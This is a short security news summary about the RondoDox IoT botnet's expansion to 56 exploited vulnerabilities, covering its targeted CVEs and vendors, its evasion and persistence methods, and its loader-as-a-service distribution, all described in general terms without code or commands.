RondoDox IoT Botnet Expands to 56 Exploits in Aggressive Campaign

Key Takeaways

RondoDox IoT botnet campaign has expanded to exploit 56 vulnerabilities across over 30 vendors.
Exploitation tactics include command injection and other legacy flaws, with a significant increase in attacks since mid-2025.
The malware employs sophisticated evasion techniques, disguising traffic and maintaining persistence on compromised systems.

Escalation of RondoDox Campaign

Security researchers have reported a significant increase in the RondoDox Internet of Things (IoT) botnet campaign, which now targets 56 vulnerabilities across more than 30 vendors. Initially, the campaign focused on just two flaws, CVE-2024-3721 in TBK DVR devices and CVE-2024-12856 in Four-Faith routers. However, as of mid-2025, active exploitation has been documented globally, with numerous vulnerabilities added to the US Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities catalog.

The botnet operators have adopted an “exploit shotgun” approach, leveraging multiple exploits to determine which successfully compromise targets. Their arsenal includes 50 command injection flaws, alongside other weaknesses related to buffer overflow and authentication bypass. Notably, legacy vulnerabilities, such as the decade-old Shellshock bug (CVE-2014-6271), feature prominently in this expanded campaign.

Trend Micro noted that the first identified RondoDox intrusion occurred on June 15, 2025, utilizing a vulnerability in the TP-Link Archer AX21 router. This flaw, originally showcased at Pwn2Own Toronto in December 2022, exemplifies the prolonged exposure of known issues, with attacks resurfacing two years later. The RondoDox malware employs XOR encoding for obfuscation and mimics legitimate traffic from popular services to evade detection.

To maintain a presence on compromised systems, RondoDox establishes various persistence mechanisms, modifying startup files and creating crontab entries. It actively terminates competing malware and disrupts system functionalities by renaming critical executables. The campaign is also distributed through a loader-as-a-service (LaaS) infrastructure, which packages RondoDox alongside other payloads like Mirai.

CloudSEK researchers identified a substantial increase of 230 percent in attack attempts from July to August 2025, revealing the sophistication of RondoDox’s operational framework. The botnet panel processes requests for commands via specific modules that facilitate injection staging and successful payload delivery. Attacks focus on command injection through inadequately sanitized POST parameters in the web interfaces of various routers and embedded devices.

The campaign’s reach has extended to enterprise applications, targeting vulnerabilities in Oracle WebLogic servers and known issues in WordPress and vBulletin systems. Moreover, RondoDox supports multiple Linux architectures, expanding its impact across various devices, including networking equipment from D-Link, Netgear, TP-Link, Cisco, and several DVR systems.

The content above is a summary. For more details, see the source article.